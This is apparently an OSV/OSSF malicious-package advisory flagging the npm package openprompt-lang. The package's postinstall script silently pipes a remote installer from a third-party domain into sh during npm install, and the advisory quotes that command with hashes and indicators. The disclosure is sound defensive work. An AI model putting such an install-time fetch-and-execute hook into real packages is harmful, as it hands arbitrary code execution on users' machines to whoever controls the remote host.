{"id":"MAL-2026-4630","summary":"Malicious code in openprompt-lang (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (2c9966d5fe1ab82b40fd24082c36cc9acf5677772768f75b30cda755d9cdd98f)\nscripts/postinstall.js runs unconditionally during `npm install`. When the `opencode` binary is not on PATH (true for nearly every fresh install), it executes `npm install -g @opencode/cli 2\u003e/dev/null || curl -fsSL https://opencode.ai/install.sh 2\u003e/dev/null | sh`. The curl-piped-to-sh fetches a mutable remote installer over the network and executes it with no hash or signature verification, no version pin, and from a third-party domain (opencode.ai) unrelated to the package publisher. The fallback also performs an unpinned global install of `@opencode/cli`, silently extending the installer's dependency surface beyond what is declared. The package's stated purpose is a CLI for AI-annotation/context engineering; auto-installing an unrelated third-party tool via `curl | sh` from a non-publisher domain at install time is outside that scope and gives whoever controls opencode.ai (now or in the future) arbitrary code execution on every machine that installs this package.\n","modified":"2026-05-26T06:02:45.461883444Z","published":"2026-05-23T23:03:36Z","database_specific":{"malicious-packages-origins":[{"source":"amazon-inspector","sha256":"0b3d3d4d116f031b0ac1d902eea51337d80a08e1885acc484d698ba38d2aabdb","id":"IN-MAL-2026-004585","versions":["1.3.0"],"import_time":"2026-05-26T05:52:53.3295444Z","modified_time":"2026-05-25T05:35:48Z"},{"source":"amazon-inspector","sha256":"19fb259f5df1648c36db4fa24dc1d050912e3fceabc8235316141e9febfe0b45","id":"IN-MAL-2026-004423","versions":["1.2.6"],"modified_time":"2026-05-24T00:58:58Z","import_time":"2026-05-26T05:52:34.289865541Z"},{"source":"amazon-inspector","sha256":"2c9966d5fe1ab82b40fd24082c36cc9acf5677772768f75b30cda755d9cdd98f","id":"IN-MAL-2026-004422","versions":["1.2.6"],"modified_time":"2026-05-24T00:57:45Z","import_time":"2026-05-26T05:52:34.183494259Z"},{"source":"amazon-inspector","sha256":"560085e8391d93e3f1c17bd78a1f3273b240f098442ab2f0414f1fb5cc2f6d3c","id":"IN-MAL-2026-004449","versions":["1.2.7"],"modified_time":"2026-05-24T02:29:05Z","import_time":"2026-05-26T05:52:37.338586987Z"},{"source":"amazon-inspector","sha256":"a127c4981cfea8a1be921c08b4ac3e915371041838d3981efc24ddc53b694a5d","id":"IN-MAL-2026-004414","versions":["1.2.4"],"modified_time":"2026-05-24T00:38:07Z","import_time":"2026-05-26T05:52:33.29493036Z"},{"source":"amazon-inspector","sha256":"a91abce6346f158c33db03696583627a1cf7f6805aa6b3f69afc85e0a32855d8","id":"IN-MAL-2026-004413","versions":["1.2.4"],"modified_time":"2026-05-24T00:37:20Z","import_time":"2026-05-26T05:52:33.159133434Z"},{"source":"amazon-inspector","sha256":"b90e8e14dd8b898c010517a81ca6e33ab98d90a514fd58d4457899c71120300a","id":"IN-MAL-2026-004409","versions":["1.2.1"],"modified_time":"2026-05-24T00:14:52Z","import_time":"2026-05-26T05:52:32.704275064Z"},{"source":"amazon-inspector","sha256":"e0a29910da10cc8d97c356e724ac483dff82a0c91225e3cdb868f1d160886d92","id":"IN-MAL-2026-004402","versions":["1.2.0"],"modified_time":"2026-05-23T23:35:56Z","import_time":"2026-05-26T05:52:31.667285387Z"},{"source":"amazon-inspector","sha256":"db2d671dd8a5cc56fe37c817c6f7a63f46f2692b858bf0ca2aa5edc34dbb15b0","id":"IN-MAL-2026-004408","versions":["1.2.1"],"modified_time":"2026-05-24T00:13:43Z","import_time":"2026-05-26T05:52:32.417343895Z"},{"source":"amazon-inspector","sha256":"29ec99421b46db9c46b09afbe1da0db595ab63584c54f31e04101739273ce992","id":"IN-MAL-2026-004411","versions":["1.2.2"],"modified_time":"2026-05-24T00:22:56Z","import_time":"2026-05-26T05:52:32.929380025Z"},{"source":"amazon-inspector","sha256":"4b78d9c204ace5f9ebde348fd931fb542ab85cd9297d0f4728fa904d5cb44a48","versions":["1.2.3"],"id":"IN-MAL-2026-004412","modified_time":"2026-05-24T00:33:14Z","import_time":"2026-05-26T05:52:33.028301822Z"},{"source":"amazon-inspector","sha256":"aba8dd892bd7521ed379e360d72bd0a09255a929e64e0d33a0cf76035e65da1c","id":"IN-MAL-2026-004448","versions":["1.2.7"],"modified_time":"2026-05-24T02:27:50Z","import_time":"2026-05-26T05:52:37.228436646Z"},{"source":"amazon-inspector","sha256":"b374a3566f692f636a236c0243da650b4db264f029477c431634bd805fca1626","id":"IN-MAL-2026-004399","versions":["1.1.0"],"import_time":"2026-05-26T05:52:31.353973464Z","modified_time":"2026-05-23T23:03:36Z"},{"source":"amazon-inspector","sha256":"e69c04ece59cfc2568d850cfc0e4554a9799196e29bdcfffbe61a04451714a0d","id":"IN-MAL-2026-004410","versions":["1.2.2"],"import_time":"2026-05-26T05:52:32.799550433Z","modified_time":"2026-05-24T00:22:04Z"},{"source":"amazon-inspector","sha256":"90498cc911c11219a4c19a0c864132e7e42de8e63f4f52b44360cd19d318e913","id":"IN-MAL-2026-004586","versions":["1.3.0"],"modified_time":"2026-05-25T05:37:21Z","import_time":"2026-05-26T05:52:53.518281193Z"},{"source":"amazon-inspector","sha256":"c559dde5b95604374665d3f852b7ad50ee78568e7a517a182496362838678e07","id":"IN-MAL-2026-004400","versions":["1.1.0"],"modified_time":"2026-05-23T23:03:37Z","import_time":"2026-05-26T05:52:31.4594297Z"},{"source":"amazon-inspector","sha256":"c9301d7c5a77059d6948110ed5ce20651c37b8df367db99f5f807496313fc33d","versions":["1.2.0"],"id":"IN-MAL-2026-004404","modified_time":"2026-05-23T23:36:56Z","import_time":"2026-05-26T05:52:31.859851238Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/openprompt-lang/v/1.3.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/openprompt-lang/v/1.2.6"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/openprompt-lang/v/1.2.4"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/openprompt-lang/v/1.2.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/openprompt-lang/v/1.2.1"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/openprompt-lang/v/1.2.3"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/openprompt-lang/v/1.2.7"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/openprompt-lang/v/1.1.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/openprompt-lang/v/1.2.2"}],"affected":[{"package":{"name":"openprompt-lang","ecosystem":"npm","purl":"pkg:npm/openprompt-lang"},"versions":["1.3.0","1.2.6","1.2.7","1.2.4","1.2.1","1.2.0","1.2.2","1.2.3","1.1.0"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/openprompt-lang/MAL-2026-4630.json","cwes":[{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"}],"indicators":{"package_integrity":[{"hashes":{"sha512_sri":"sha512-AQgBNBhfzGND+x14tiAutREAWF1eSlEItVAth1S7e0RvwbRtSlMDF3Q4FYzXhtp+f7v6aaNn/w00htJUBgQm2A==","sha1":"d9b5efbc402ec6a1373b98740a72573274325873"},"filename":"openprompt-lang-1.3.0.tgz"}],"domains":["34.9.16.104.in-addr.arpa"],"evidence_files":[{"sha256":"2515e6c5a0ee46d25c8811e35e5e2679fcbe08cfb77b27f6e82c172165c19c58","path":"scripts/postinstall.js","tlsh":"4eb1e07692f801343f42c0ad3d1b1012b07a79637704f9987b9ebba95fcd82885622fd"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"}]}